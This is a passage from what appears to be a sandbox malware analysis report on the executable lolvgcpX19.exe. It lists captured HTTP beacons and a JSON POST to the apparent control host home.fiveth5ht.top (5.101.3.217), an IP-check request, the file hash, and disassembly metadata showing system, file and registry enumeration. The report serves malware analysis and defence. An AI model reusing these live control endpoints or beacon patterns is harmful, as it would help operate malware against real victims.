"svchost.exe", [TRUNCATED]
                                Dec 27, 2024 08:46:27.998560905 CET | 157 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.22.1
                                Date: Fri, 27 Dec 2024 07:46:27 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 1
                                Connection: close
                                Data Raw: 30
                                Data Ascii: 0


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                1 | 192.168.2.6 | 49721 | 5.101.3.217 | 80 | 6720 | C:\Users\user\Desktop\lolvgcpX19.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Dec 27, 2024 08:46:28.323616982 CET | 98 | OUT | GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1
                                Host: home.fiveth5ht.top
                                Accept: */*
                                Dec 27, 2024 08:46:29.896974087 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
                                Server: nginx/1.22.1
                                Date: Fri, 27 Dec 2024 07:46:29 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 207
                                Connection: close
                                Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                2 | 192.168.2.6 | 49727 | 5.101.3.217 | 80 | 6720 | C:\Users\user\Desktop\lolvgcpX19.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Dec 27, 2024 08:46:30.233782053 CET | 171 | OUT | POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                Host: home.fiveth5ht.top
                                Accept: */*
                                Content-Type: application/json
                                Content-Length: 31
                                Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                Data Ascii: { "id1": "0", "data": "Done1" }
                                Dec 27, 2024 08:46:31.787430048 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
                                Server: nginx/1.22.1
                                Date: Fri, 27 Dec 2024 07:46:31 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 207
                                Connection: close
                                Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                0 | 192.168.2.6 | 49708 | 3.218.7.103 | 443 | 6720 | C:\Users\user\Desktop\lolvgcpX19.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-27 07:46:21 UTC | 52 | OUT | GET /ip HTTP/1.1
                                Host: httpbin.org
                                Accept: */*
                                2024-12-27 07:46:21 UTC | 224 | IN | HTTP/1.1 200 OK
                                Date: Fri, 27 Dec 2024 07:46:21 GMT
                                Content-Type: application/json
                                Content-Length: 31
                                Connection: close
                                Server: gunicorn/19.9.0
                                Access-Control-Allow-Origin: *
                                Access-Control-Allow-Credentials: true
                                2024-12-27 07:46:21 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                Data Ascii: { "origin": "8.46.123.189"}


                                Target ID:0
                                Start time:02:46:15
                                Start date:27/12/2024
                                Path:C:\Users\user\Desktop\lolvgcpX19.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\lolvgcpX19.exe"
                                Imagebase:0xf80000
                                File size:4'502'528 bytes
                                MD5 hash:605F4D4C3E2BE9F71FE0974B6CE3C714
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                  Execution Graph

                                  Execution Coverage:2.2%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:18.7%
                                  Total number of Nodes:466
                                  Total number of Limit Nodes:75
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                  • API String ID: 0-1590685507
                                  • Opcode ID: 1c00b724761877836388fa7a0444d5716ec096b4723c437da2590e895ebb1725
                                  • Instruction ID: 20ebccb399cfd86669e6e44cd0a3b89df7b329ed654b301f149064af40fb6b6a
                                  • Opcode Fuzzy Hash: 1c00b724761877836388fa7a0444d5716ec096b4723c437da2590e895ebb1725
                                  • Instruction Fuzzy Hash: 38C2C231A04345DFD714CF29C981BAAB7E1BF84324F19866DEC989B252D730ED89DB81

                                  Control-flow Graph

                                  APIs
                                  • GetSystemInfo.KERNELBASE ref: 00F82579
                                  • GlobalMemoryStatusEx.KERNELBASE ref: 00F825CC
                                  • GetDriveTypeA.KERNELBASE ref: 00F82647
                                  • GetDiskFreeSpaceExA.KERNELBASE ref: 00F8267E
                                  • KiUserCallbackDispatcher.NTDLL ref: 00F827E2
                                  • SHGetKnownFolderPath.SHELL32 ref: 00F8286D
                                  • FindFirstFileW.KERNELBASE ref: 00F828F8
                                  • FindNextFileW.KERNELBASE ref: 00F8291F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: FileFind$CallbackDiskDispatcherDriveFirstFolderFreeGlobalInfoKnownMemoryNextPathSpaceStatusSystemTypeUser
                                  • String ID: @$`
                                  • API String ID: 2066228396-3318628307
                                  • Opcode ID: af5c99aa4e46185ea9afced5acf79447a5f27a71ca21a2804631aed90958d8bd
                                  • Instruction ID: 3efdffb75cd5d001b5a47e15eeb31b1a615215d541e227011908d8847c86f364
                                  • Opcode Fuzzy Hash: af5c99aa4e46185ea9afced5acf79447a5f27a71ca21a2804631aed90958d8bd
                                  • Instruction Fuzzy Hash: CBD1D6B49083099FCB10EF69C98469EBBF0BF54344F01896EE898D7351E7749A84CF92

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                  • String ID: 0
                                  • API String ID: 2406880114-4108050209
                                  • Opcode ID: 13b977eb366b5eb6f377dd0050a96e4ddd962f69b1d71f696bbb204c349671c6
                                  • Instruction ID: efab34478837dd4a7b6de14ce659fbf185c2f696c0a5e0406c1082870cd7c0be
                                  • Opcode Fuzzy Hash: 13b977eb366b5eb6f377dd0050a96e4ddd962f69b1d71f696bbb204c349671c6
                                  • Instruction Fuzzy Hash: B7E1E6B59093099FCB50EF68D98469EBBF4BF54304F40886EE988D7390E7749988DF42

                                  Control-flow Graph

                                  APIs
                                  • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00F90711
                                  • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00F909DD
                                  • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00F909FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: EventSelect$EnumEventsNetwork
                                  • String ID: multi.c
                                  • API String ID: 2170980988-214371023
                                  • Opcode ID: 9aed7c607d3df9be1f00b08f2a196762033d731e1d9fa4823e7643f879322867
                                  • Instruction ID: c73ed871a7d6c3d9cefca8ade27e1807612beee7da764b275ca6eacfc99e3eab
                                  • Opcode Fuzzy Hash: 9aed7c607d3df9be1f00b08f2a196762033d731e1d9fa4823e7643f879322867
                                  • Instruction Fuzzy Hash: B2D1C075A083019FFB11DF64C881BABB7E5FF94358F04482CF89586251EB74E948EB92

                                  Control-flow Graph

                                  APIs
                                  • getsockname.WS2_32(-00000020,-00000020,?), ref: 0104B2B6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: getsockname
                                  • String ID: ares__sortaddrinfo.c$cur != NULL
                                  • API String ID: 3358416759-2430778319
                                  • Opcode ID: 3482fafdc40ff745f6da6a1658dba8a380ff2c17e25af9869f26842a40dd0675
                                  • Instruction ID: 2375f6aa1c4eab33f3e12d9320b428bdfb732ab8b8a737a546b8b75e6b4e823b
                                  • Opcode Fuzzy Hash: 3482fafdc40ff745f6da6a1658dba8a380ff2c17e25af9869f26842a40dd0675
                                  • Instruction Fuzzy Hash: B7C15DB16043159FD758DF29C8C0A6ABBE1BF88314F05897CE9898B3A1DB35ED45CB81
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 204b3d0f3f977e4737892a17eaa8374535c17a9027ced49a22c0c2ec0a016221
                                  • Instruction ID: bcfc50e617266ad316aa7c5bdcb73d0c77ba66ece197936646af7f9708b0b6ef
                                  • Opcode Fuzzy Hash: 204b3d0f3f977e4737892a17eaa8374535c17a9027ced49a22c0c2ec0a016221
                                  • Instruction Fuzzy Hash: 8C910531A2D3494BEB35AB2988947BB72D5EFC4334F148B2CE899431E4E7759C40F681
                                  APIs
                                  • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0103712E,?,?,?,00001001,00000000), ref: 0104A90D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: recvfrom
                                  • String ID:
                                  • API String ID: 846543921-0
                                  • Opcode ID: 608855ba1aaaf3c823f2c670f9b97f1d09c826dbf47ff3ca05c95b891aa72150
                                  • Instruction ID: 883c959207a7df9a0245a40114ca53ceff1fc8696901a86b121c32774ab00a29
                                  • Opcode Fuzzy Hash: 608855ba1aaaf3c823f2c670f9b97f1d09c826dbf47ff3ca05c95b891aa72150
                                  • Instruction Fuzzy Hash: 35F06279208308AFD1109F01DC84D6BBBEDEFC9654F05456DF988232118270AE10CA72
                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0103AA19
                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0103AA4C
                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0103AA97
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0103AAE9
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0103AB30
                                  • RegCloseKey.KERNELBASE(?), ref: 0103AB6A
                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0103AB82
                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0103AC46
                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0103AD0A
                                  • RegEnumKeyExA.KERNELBASE ref: 0103AD8D
                                  • RegCloseKey.KERNELBASE(?), ref: 0103ADD9
                                  • RegEnumKeyExA.KERNELBASE ref: 0103AE08
                                  • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0103AE2A
                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0103AE54
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0103AF63
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0103AFB2
                                  • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0103B072
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Similarity
                                  • API ID: QueryValue$Open$CloseEnum
                                  • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                  • API String ID: 4217438148-1047472027
                                  • Opcode ID: d9216f72fc8f1c08ae504661bbe92b8568f30fdbb40cdfbbaf4955a0b745a78c
                                  • Instruction ID: 536457ea07d6445856f76f4fd02f1e4bc042b84468cafe257c36980884efb95a
                                  • Opcode Fuzzy Hash: d9216f72fc8f1c08ae504661bbe92b8568f30fdbb40cdfbbaf4955a0b745a78c
                                  • Instruction Fuzzy Hash: D7729EB5604301EBE761DB28CC81B6B7BECAF85704F145828F9C5DB291E771E944CB62
                                  APIs
                                  • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00FBA831
                                  Strings
                                  • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00FBAD0A
                                  • cf-socket.c, xrefs: 00FBA5CD, 00FBA735
                                  • Trying %s:%d..., xrefs: 00FBA7C2, 00FBA7DE
                                  • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00FBA6CE
                                  • Local Interface %s is ip %s using address family %i, xrefs: 00FBAE60
                                  • Name '%s' family %i resolved to '%s' family %i, xrefs: 00FBADAC
                                  • Bind to local port %d failed, trying next, xrefs: 00FBAFE5
                                  • bind failed with errno %d: %s, xrefs: 00FBB080
                                  • @, xrefs: 00FBA8F4
                                  • cf_socket_open() -> %d, fd=%d, xrefs: 00FBA796
                                  • @, xrefs: 00FBAC42
                                  • Couldn't bind to '%s' with errno %d: %s, xrefs: 00FBAE1F
                                  • Could not set TCP_NODELAY: %s, xrefs: 00FBA871
                                  • Trying [%s]:%d..., xrefs: 00FBA689
                                  • Local port: %hu, xrefs: 00FBAF28
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Similarity
                                  • API ID: setsockopt
                                  • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                  • API String ID: 3981526788-2373386790
                                  • Opcode ID: c886ffd98389488059a3ad422e92343e480da3f547b111451834160918ddb26b
                                  • Instruction ID: 90060f4d64dba5a54c45858867fa05f3d7ddf75f7d7dc7fb5b004a585bff72f7
                                  • Opcode Fuzzy Hash: c886ffd98389488059a3ad422e92343e480da3f547b111451834160918ddb26b
                                  • Instruction Fuzzy Hash: 4762F171908381ABE7218F25CC46BEBB7E5BF84314F04492DF98897292E771E845DB93

                                  Control-flow Graph

                                  [Control-flow graph: entry node 1049740-104975b; API calls in graph: RegOpenKeyExA, RegQueryValueExA, RegCloseKey]
                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 01049946
                                  • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 01049974
                                  • RegCloseKey.KERNELBASE(?), ref: 0104998B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                  • API String ID: 3677997916-4129964100
                                  • Opcode ID: f2ae22ca7ec805d1572573146f61e59dfd65f72c5217818586f33a3c67f99238
                                  • Instruction ID: b4298473cef717a7f196081c0759e05818669a5a57145baf79c385dca6dd6464
                                  • Opcode Fuzzy Hash: f2ae22ca7ec805d1572573146f61e59dfd65f72c5217818586f33a3c67f99238
                                  • Instruction Fuzzy Hash: D032D8F5900202ABEB51AB24ECC1B5B76D8AF98318F084574FDC997252FB31E925C793

                                  Control-flow Graph

                                  [Control-flow graph: entry node fb8b50-fb8b69; API calls in graph: connect, SleepEx]
                                  APIs
                                  • connect.WS2_32(?,?,00000001), ref: 00FB8C2F
                                  • SleepEx.KERNELBASE(00000000,00000000), ref: 00FB8CF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Similarity
                                  • API ID: Sleepconnect
                                  • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                  • API String ID: 238548546-879669977
                                  • Opcode ID: 45b9fd6bcde02e0456d1a20ffafaf87da793173137f2b49782ec54efb78b44a8
                                  • Instruction ID: 0be5f9976df908533123e5daf6e9f6d1818bb2a6268b75d843fd9a2183f43f62
                                  • Opcode Fuzzy Hash: 45b9fd6bcde02e0456d1a20ffafaf87da793173137f2b49782ec54efb78b44a8
                                  • Instruction Fuzzy Hash: D0B1C270A04306AFDB10CF35CD85BE67BA8AF84364F04892DE8594B2D2DB71EC46DB61

                                  Control-flow Graph

                                  [Control-flow graph: entry node f82f17-f82f8c; API calls in graph: RegOpenKeyExA, RegEnumKeyExA, RegQueryValueExA, RegCloseKey]
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Similarity
                                  • API ID: CloseEnumOpen
                                  • String ID: d
                                  • API String ID: 1332880857-2564639436
                                  • Opcode ID: b401a41cd2624cdcba0f04c6029da2be9216d76b58664e573de426e2a37e6985
                                  • Instruction ID: 5e3df96ec7630c129f07d076f96f16dafa16cfc213c25dbf4a57dbe5f3ae15e7
                                  • Opcode Fuzzy Hash: b401a41cd2624cdcba0f04c6029da2be9216d76b58664e573de426e2a37e6985
                                  • Instruction Fuzzy Hash: 1971A6B490431A9FDB10EF69C98479EBBF0BF94308F10886DE99897351D7749A88CF52

                                  Control-flow Graph

                                  [Control-flow graph: entry node fb9290-fb92ed; API calls in graph: WSAIoctl, setsockopt]
                                  APIs
                                  • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00FB935C
                                  • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00FB9388
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Similarity
                                  • API ID: Ioctlsetsockopt
                                  • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d

                                  Control-flow Graph (graph not reproduced; legend: Executed / Not Executed)
                                  APIs
                                  • send.WS2_32(multi.c,?,?,?,00F83D4E,00000000,?,?,00F907BF), ref: 00F876EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Similarity
                                  • API ID: send
                                  • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send

                                  Control-flow Graph (graph not reproduced; legend: Executed / Not Executed)
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Similarity
                                  • API ID: recv
                                  • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv

                                  Control-flow Graph (graph not reproduced; legend: Executed / Not Executed)
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Similarity
                                  • API ID: socket
                                  • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket

                                  Control-flow Graph (graph not reproduced; legend: Executed / Not Executed)
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Similarity
                                  • API ID: _open
                                  • String ID: terminated$@

                                  Control-flow Graph (graph not reproduced; legend: Executed / Not Executed)
                                  APIs
                                  • getsockname.WS2_32(?,?,00000080), ref: 00FBA1C6
                                  Strings
                                  • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00FBA23B
                                  • getsockname() failed with errno %d: %s, xrefs: 00FBA1F0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Similarity
                                  • API ID: getsockname
                                  • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s

                                  Control-flow Graph (graph not reproduced; legend: Executed / Not Executed)
                                  APIs
                                  • WSAStartup.WS2_32(00000202), ref: 00F9D65B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Similarity
                                  • API ID: Startup
                                  • String ID: if_nametoindex$iphlpapi.dll

                                  Control-flow Graph (graph not reproduced; legend: Executed / Not Executed)
                                  APIs
                                  • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0104AB9B
                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0104ABE4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: ioctlsocketsocket
                                  • String ID:
                                  • API String ID: 416004797-0
                                  • Opcode ID: b387edef7377a2b0be7a4317a35c002660033b526c626d2ae87d3e253d301d0b
                                  • Instruction ID: f133ada611dc0f4a0504c2dc18c4baf08474acc8891ebbf9a2722821d9a3ccbb
                                  • Opcode Fuzzy Hash: b387edef7377a2b0be7a4317a35c002660033b526c626d2ae87d3e253d301d0b
                                  • Instruction Fuzzy Hash: 35E1C0B0644302DBEB20CF29C884B6B7BE5EF85304F044A7CEADA8B291D775D944CB91
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: closesocket
                                  • String ID: FD %s:%d sclose(%d)
                                  • API String ID: 2781271927-3116021458
                                  • Opcode ID: 5fd692137a006cd33ab3a5b91405c29687b96a84bac3c12f17ff157f16f9969f
                                  • Instruction ID: 295829faec33b19d8df2e610ef96a8967b4cc6364bd4bac603b4e242b0d98146
                                  • Opcode Fuzzy Hash: 5fd692137a006cd33ab3a5b91405c29687b96a84bac3c12f17ff157f16f9969f
                                  • Instruction Fuzzy Hash: FFD05E33A093212B863079996C49C8BBBA8DDC6F70B160C59F95067214D130DC0597E2
                                  APIs
                                  • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0104B29E,?,00000000,?,?), ref: 0104B0BA
                                  • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,01033C41,00000000), ref: 0104B0C1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: ErrorLastconnect
                                  • String ID:
                                  • API String ID: 374722065-0
                                  • Opcode ID: f6e083e7e3acec27ade94358eae7ccce9e5fab3a92bb621e974ced2266c16fcf
                                  • Instruction ID: 89c46129d3a48c946551c73daab48b28e3cd9c6d1b343a3b2d0c4f8b75db9399
                                  • Opcode Fuzzy Hash: f6e083e7e3acec27ade94358eae7ccce9e5fab3a92bb621e974ced2266c16fcf
                                  • Instruction Fuzzy Hash: 9801D8763042009BDB205A798CC4E6AB7D9FF89265F040B74F9BC931D1D726E9508751
                                  APIs
                                  • gethostname.WS2_32(00000000,00000040), ref: 01034AA5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: gethostname
                                  • String ID:
                                  • API String ID: 144339138-0
                                  • Opcode ID: 725e75d9e6ef61f98a61a7f54f20af4c2789f0aed2342244820a292e8dca1d66
                                  • Instruction ID: 4a7109d7c48f654369007ed779d90ecc07be8528a066aa0d38b662fa7f47d8a3
                                  • Opcode Fuzzy Hash: 725e75d9e6ef61f98a61a7f54f20af4c2789f0aed2342244820a292e8dca1d66
                                  • Instruction Fuzzy Hash: EA51DEB06047008BF7758A29DD497267ADCAF81318F0419BDDACACE6E1E7B4E440CB02
                                  APIs
                                  • getsockname.WS2_32(?,?,00000080), ref: 0104AFD1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: getsockname
                                  • String ID:
                                  • API String ID: 3358416759-0
                                  • Opcode ID: aeaf1f1284308bad58707dd0e3973cd0feafe2f1f663fc278c05d1fdb76208ed
                                  • Instruction ID: 5d444060380517d064aac4adae3862fc2cebafa33f45b5475b5ee2f9674e6a46
                                  • Opcode Fuzzy Hash: aeaf1f1284308bad58707dd0e3973cd0feafe2f1f663fc278c05d1fdb76208ed
                                  • Instruction Fuzzy Hash: B7118470848785D6EB268F5CD4427F6B3F4EFC0329F109658E5D942150F73696C58BC2
                                  APIs
                                  • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0104A97F
                                  Memory Dump Source
